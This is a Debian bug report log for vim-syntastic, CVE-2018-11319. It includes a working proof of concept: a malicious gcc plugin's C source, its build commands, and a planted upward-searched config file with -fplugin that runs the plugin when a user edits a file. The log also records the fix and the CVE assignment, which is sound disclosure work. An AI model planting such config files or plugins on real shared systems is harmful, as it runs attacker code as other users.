Debian Bug report logs -
#894736
vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios
Reported by: Enrico Zini <enrico@debian.org>
Date: Tue, 3 Apr 2018 18:06:01 UTC
Severity: serious
Tags: fixed-upstream, security, upstream
Found in versions vim-syntastic/3.7.0-1, vim-syntastic/3.5.0-1, vim-syntastic/3.8.0-1
Fixed in versions vim-syntastic/3.9.0-1, vim-syntastic/3.7.0-1+deb9u2
Done: Andrea Capriotti <capriott@debian.org>
Bug is archived. No further changes may be made.
Forwarded to https://github.com/vim-syntastic/syntastic/issues/2170
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Andrea Capriotti <capriott@debian.org>:
Bug#894736; Package vim-syntastic.
(Tue, 03 Apr 2018 18:06:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Enrico Zini <enrico@debian.org>:
New Bug report received and forwarded. Copy sent to Andrea Capriotti <capriott@debian.org>.
(Tue, 03 Apr 2018 18:06:03 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: vim-syntastic
Version: 3.8.0-1
Severity: serious
Hello,
syntastic has a Configuration Files[1] feature enabled for several
checkers, where:
a configuration file is looked up in the directory of the file being
checked, then upwards in parent directories. The search stops either
when a file with the right name is found, or when the root of the
filesystem is reached.[1]
[1] https://github.com/vim-syntastic/syntastic/blob/master/doc/syntastic-checkers.txt#L7744
Each line found in the configuration file is escaped as a single
argument and appended to the checker command being run.
I am not an expert on the various possibly dangerous command line
options of all possible checkers, but I played with one I knew how to
play with, and what follows is a possible attack. There might be easier
attacks on checkers that are enabled by default, since the configuration
files features, as it is now, leaves a pretty wide attack surface open.
## Step 1: a malicious gcc plugin
The source code:
#include <gcc-plugin.h>
#include <stdio.h>
int plugin_is_GPL_compatible;
int plugin_init(struct plugin_name_args *info, /* Argument infor */
struct plugin_gcc_version *ver) /* Version of GCC */
{
fprintf(stdout, "hello\n");
FILE* out = fopen("/tmp/test", "wt");
fprintf(out, "arbitrary code execution\n");
fclose(out);
};
Building the plugin:
$ gcc -I$(gcc -print-file-name=plugin)/include -fPIC -fno-rtti -O2 -shared plugin.cc -o /tmp/plugin.so
Installing the plugin as nobody.nogroup in /tmp:
$ sudo chown nobody.nogroup /tmp/plugin.so
## Step 2: a syntastic config file
echo -fplugin=/tmp/z.so > /tmp/.syntastic_avrgcc_config
sudo chown nobody.nogroup /.syntastic_avrgcc_config
## Step 3: enable the avrgcc plugin
let g:syntastic_cpp_checkers = ['avrgcc']
## Step 4: edit a C++ file in /tmp
touch /tmp/foo.cc
vim /tmp/foo.cc
## Step 5: cry
$ cat /tmp/test
arbitrary code execution
# What should be different
There are several steps that can avoid this:
1. allow to disable this feature, and ship with this feature disabled by
default
2. stop recursing upwards when hitting a directory that's writable by
someone other than the current user
3. check that the config files are owned by the current user
# Mitigation
I am not a vimscript expert, and unfortunately I have not found a way to
disable this behaviour without editing the syntastic config files.
Enrico
-- System Information:
Debian Release: buster/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: amd64 (x86_64)
Kernel: Linux 4.14.0-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8), LANGUAGE=en_IE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages vim-syntastic depends on:
ii vim 2:8.0.1453-1+b1
ii vim-addon-manager 0.5.7
vim-syntastic recommends no packages.
Versions of packages vim-syntastic suggests:
pn checkstyle <none>
pn chktex <none>
pn closure-linter <none>
ii cppcheck 1.82-1
pn foodcritic <none>
pn hlint <none>
pn lacheck <none>
pn libperl-critic-perl <none>
pn libxml2-utils <none>
pn pep8 <none>
pn puppet-lint <none>
ii pyflakes 1.6.0-1
pn pylint <none>
pn python-flake8 <none>
pn shellcheck <none>
pn sparse <none>
pn splint <none>
pn tidy <none>
-- no debconf information
Added tag(s) security.
Request was from Adrian Bunk <bunk@debian.org>
to control@bugs.debian.org.
(Tue, 03 Apr 2018 22:03:05 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org:
Bug#894736; Package vim-syntastic.
(Thu, 19 Apr 2018 15:15:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Andrea Capriotti <capriott@debian.org>:
Extra info received and forwarded to list.
(Thu, 19 Apr 2018 15:15:06 GMT) (full text, mbox, link).
Message #12 received at 894736@bugs.debian.org (full text, mbox, reply):
[Message part 1 (text/plain, inline)]
Il giorno mar, 03/04/2018 alle 20.03 +0200, Enrico Zini ha scritto:
> Package: vim-syntastic
> Version: 3.8.0-1
> Severity: serious
>
> Hello,
>
> syntastic has a Configuration Files[1] feature enabled for several
> checkers, where:
>
> a configuration file is looked up in the directory of the file
> being
> checked, then upwards in parent directories. The search stops
> either
> when a file with the right name is found, or when the root of the
> filesystem is reached.[1]
>
> [1] https://github.com/vim-syntastic/syntastic/blob/master/doc/syntas
> tic-checkers.txt#L7744
>
> Each line found in the configuration file is escaped as a single
> argument and appended to the checker command being run.
>
> I am not an expert on the various possibly dangerous command line
> options of all possible checkers, but I played with one I knew how to
> play with, and what follows is a possible attack. There might be
> easier
> attacks on checkers that are enabled by default, since the
> configuration
> files features, as it is now, leaves a pretty wide attack surface
> open.
Hi Enrico,
you are right and the attack works. I opened this upstream issue:
https://github.com/vim-syntastic/syntastic/issues/2170
and he fixed the problem in 3.9.0 release. I'll build and upload it as
soon as possible.
Best Regards
--
Andrea Capriotti <capriott@debian.org>
[signature.asc (application/pgp-signature, inline)]
Reply sent
to Andrea Capriotti <capriott@debian.org>:
You have taken responsibility.
(Thu, 19 Apr 2018 15:57:04 GMT) (full text, mbox, link).
Notification sent
to Enrico Zini <enrico@debian.org>:
Bug acknowledged by developer.
(Thu, 19 Apr 2018 15:57:04 GMT) (full text, mbox, link).
Message #17 received at 894736-close@bugs.debian.org (full text, mbox, reply):
Source: vim-syntastic
Source-Version: 3.9.0-1
We believe that the bug you reported is fixed in the latest version of
vim-syntastic, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 894736@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Andrea Capriotti <capriott@debian.org> (supplier of updated vim-syntastic package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Thu, 19 Apr 2018 09:38:52 +0200
Source: vim-syntastic
Binary: vim-syntastic
Architecture: source all
Version: 3.9.0-1
Distribution: unstable
Urgency: medium
Maintainer: Andrea Capriotti <capriott@debian.org>
Changed-By: Andrea Capriotti <capriott@debian.org>
Description:
vim-syntastic - Syntax checking hacks for vim
Closes: 894736
Changes:
vim-syntastic (3.9.0-1) unstable; urgency=medium
.
* New upstream release (Closes: #894736)
* Git repository migrated to Salsa
* Standard version bumped to 4.1.4
Checksums-Sha1:
918fd3b0e5c966d17e1fee1de272fa0f1028a8ce 1883 vim-syntastic_3.9.0-1.dsc
ce9a51de8d3e4542e8bfdd467d74489cdc9957e9 263275 vim-syntastic_3.9.0.orig.tar.gz
4e360b851d081acc77bcf3f6adf9470f77872c2d 5376 vim-syntastic_3.9.0-1.debian.tar.xz
64da9d1a0af01a2fb370fb38e59624f64083c7fa 144740 vim-syntastic_3.9.0-1_all.deb
c3003ad2f4190b0cd1a305ae0a638dc01cf78315 5715 vim-syntastic_3.9.0-1_amd64.buildinfo
Checksums-Sha256:
112e396966d86300c4310cc4db088e848a4a58c820fbdd26614de1c19d2a97f0 1883 vim-syntastic_3.9.0-1.dsc
7ecaed94dc6a5b3e1f8511c94e1df9436fad1895b3337a1cd3d4e77a526c155b 263275 vim-syntastic_3.9.0.orig.tar.gz
43a1b9dcdf9e33f51b0942fad60f8be6bd21fcecdaf75a5ce4e74edb021d0409 5376 vim-syntastic_3.9.0-1.debian.tar.xz
b15d890a45ea852268dbd9366500710b4cef57a398885a7d1dd093f0e6d611db 144740 vim-syntastic_3.9.0-1_all.deb
3aade8830d6056c50e4df4716e843681b8540b3f57518b0c540d216ba31c2078 5715 vim-syntastic_3.9.0-1_amd64.buildinfo
Files:
721a969c67bdafc53480689d69dbd842 1883 editors extra vim-syntastic_3.9.0-1.dsc
9632d807d54de03968fad8ccbe831764 263275 editors extra vim-syntastic_3.9.0.orig.tar.gz
81dcadf07a25444d36fdf0fc40fa26cf 5376 editors extra vim-syntastic_3.9.0-1.debian.tar.xz
9b55221101d3c1f13143fa839da00c65 144740 editors extra vim-syntastic_3.9.0-1_all.deb
1f71dbc1b5bd1e0b2bef961b68e435af 5715 editors extra vim-syntastic_3.9.0-1_amd64.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEGvhvgTlGG2tOSvezC6/u7+lpvVQFAlrYhq4ACgkQC6/u7+lp
vVSOVA//YOqKEkpBZbf/1/RXqnyz08LovIrNoNrwcWW1Low5PR+yh8wf+i9H2QnM
rbIa62nYV5u40elIJIiEB2oi1SBR96F3b/71NwAhWAMtQb3dFbOiy/n2+wxMvL0/
FfE+vGKBnFegERHnPhSEms5E5jfRPw72RSVaqljDlaUrXWdL8rUGXJ5Zlwkzmx8Z
veyF9GizlCP2QI8mvjMlhMYN6Iv/GYotIisE84hFKSKVccShaDsmShHLm4R6LYDi
YjGDhnsF8Hrqs9x+l40aMh9E5gP4XP2j2XFfF+20h54pKfA9FgmTUpLRlCWWRJWI
5rSUAlO9F6qfK8FCUzDkGW03b5lmcrh7/jJXekpEyS6uzbSDU+c+gNXLfyT0jZOI
pSBaRzD0Y/krcCb07VaT29eDXkj7YAGaF7NtujlGedkxfBvynsM9uXYdQAT1yb4w
py0jBK74gaVdBY+XlF6W+KYme4JDOxrNzagaPlBRSu3XhRtSOa+viT4kdv2KrNYG
sUn4a0oJzQCfyS5ZQpgH+RanqwCWEI1eIGbMahRDJGcY+dZejr/Zj6pg1MxYarqb
rwf27BvUZXBotEi2UVJSXSxO24QLa+gshSRLyqh8tNvzL2MLtcgE51d7co7SErEU
2xGAklYKa+z6IVpN4HbfGu8Yoby2mF5er+JcZK1QuH/AyVKf8Sk=
=k++O
-----END PGP SIGNATURE-----
Added tag(s) upstream and fixed-upstream.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sun, 06 May 2018 20:09:06 GMT) (full text, mbox, link).
Information forwarded
to debian-bugs-dist@lists.debian.org, Andrea Capriotti <capriott@debian.org>:
Bug#894736; Package vim-syntastic.
(Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to Andrea Capriotti <capriott@debian.org>.
(Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).
Message #26 received at 894736@bugs.debian.org (full text, mbox, reply):
Control: retitle -1 vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios
Hi
This issue was assigned CVE-2018-11319.
Regards,
Salvatore
Changed Bug title to 'vim-syntastic: CVE-2018-11319: Checker config files allow arbitrary code execution scenarios' from 'Checker config files allow arbitrary code execution scenarios'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to 894736-submit@bugs.debian.org.
(Sun, 20 May 2018 21:00:05 GMT) (full text, mbox, link).
Marked as found in versions vim-syntastic/3.5.0-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 26 May 2018 09:21:05 GMT) (full text, mbox, link).
Marked as found in versions vim-syntastic/3.7.0-1.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 26 May 2018 09:21:05 GMT) (full text, mbox, link).
Marked as fixed in versions vim-syntastic/3.7.0-1+deb9u2.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Sat, 04 Aug 2018 14:51:03 GMT) (full text, mbox, link).
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 11 Nov 2018 07:29:06 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed Jun 19 15:46:32 2019;
Machine Name:
beach
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon